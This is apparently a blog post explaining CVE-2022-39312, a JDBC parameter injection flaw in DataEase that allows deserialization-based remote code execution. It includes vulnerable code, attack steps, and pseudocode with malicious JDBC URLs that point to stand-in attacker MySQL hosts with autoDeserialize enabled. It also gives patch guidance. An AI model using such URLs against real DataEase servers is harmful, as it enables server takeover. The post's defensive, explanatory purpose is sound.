DataEase is an open source data visualization and analysis platform widely used for exploring and sharing data insights. If your organization uses DataEase and hasn’t upgraded past version 1.15.2, you need to pay attention to CVE-2022-39312. This vulnerability allows attackers to execute system-level commands with just a crafted JDBC connection string to a malicious MySQL server.
This post breaks down CVE-2022-39312 in simple language, shows how the vulnerability works with code samples, links to original sources, and explains how it can be exploited.
The issue sits in the handling of JDBC parameters for MySQL data sources.
- Attackers can add dangerous parameters to the JDBC URL and connect DataEase to a malicious MySQL server.
Through a known MySQL JDBC driver flaw, this can lead to Java deserialization attacks.
- Successful exploitation means remote code execution (RCE) — in other words, attackers could run their own commands on your server.
The flaw is in the file
backend/src/main/java/io/dataease/provider/datasource/JdbcProvider.java
The Problem
DataEase lets users create and customize data sources, including writing JDBC URLs for MySQL. But, it does not filter or sanitize the JDBC parameters users provide. This means a clever attacker can sneak in extra parameters needed for an exploit.
Here’s a simplified snippet of how DataEase processes a new data source (with dangerous omitted checking):
public class MysqlConfiguration extends JdbcProvider {
public Connection getConnection(String url, String user, String password) throws SQLException {
// url is taken from user input and used directly
return DriverManager.getConnection(url, user, password);
}
}
Notice: url (the JDBC string) is used with no sanitization, so anything in it is processed by the MySQL JDBC driver.
Craft Malicious MySQL Server:
The attacker sets up a malicious MySQL server that speaks the protocol and triggers deserialization on connect.
Send Dangerous JDBC URL:
The attacker submits a new DataEase data source using a JDBC URL with parameters designed to trigger deserialization:
`
jdbc:mysql://attacker-server:3306/payload_db?autoDeserialize=true&queryInterceptors=...
Trigger Deserialization:
On connection, the Java MySQL JDBC client fetches serialized data from the attacker’s server and deserializes it *unsafely*.
Arbitrary Code Execution:
If correct gadget chains are present, the attacker’s payload is executed on the DataEase server—this could open a reverse shell, download malware, or anything else.
A minimal example in pseudocode, for illustration purposes only
// Step 1: Attacker crafts a JDBC URL with deserialization enabled
String url = "jdbc:mysql://evil-attacker-server:3306/fake_db?autoDeserialize=true&queryInterceptors=com.attacker.MyInterceptor";
// Step 2: DataEase admin adds this as a new data source
dataease.addDataSource("malicious-mysql", url, "user", "pass");
// Step 3: DataEase server connects, triggering the attack
Connection conn = DriverManager.getConnection(url, "user", "pass"); // Remote code execution here!
Note: In practice, attackers use known gadget chains and special MySQL servers (such as ysoserial’s MySQL payloads).
Patch and Fix
The DataEase team fixed this in version 1.15.2. The patch filters JDBC parameters and now blocks dangerous ones like autoDeserialize, loadBalance, and queryInterceptors. You can see details in their GitHub advisory.
Upgrade immediately if you haven’t:
Download latest DataEase releases
Attack Demo and References
- Original CVE Details - nvd.nist.gov
- GitHub Security Advisory
- Blog post: JDBC Deserialization Attacks by orange-sys
- MySQL Fake Server for RCE Exploits
- ysoserial Java Deserialization gadgets
Summary
CVE-2022-39312 is a perfect demonstration that allowing user-controlled connection strings is dangerous, especially when the underlying libraries have deserialization attacks. Attackers can own your DataEase server with just a crafted JDBC URL unless you upgrade to version 1.15.2 or later.
Follow best practices for supply chain security
Stay safe and always keep your open source software up to date!
Timeline
Published on: 10/25/2022 17:15:00 UTC
Last modified on: 10/28/2022 18:24:00 UTC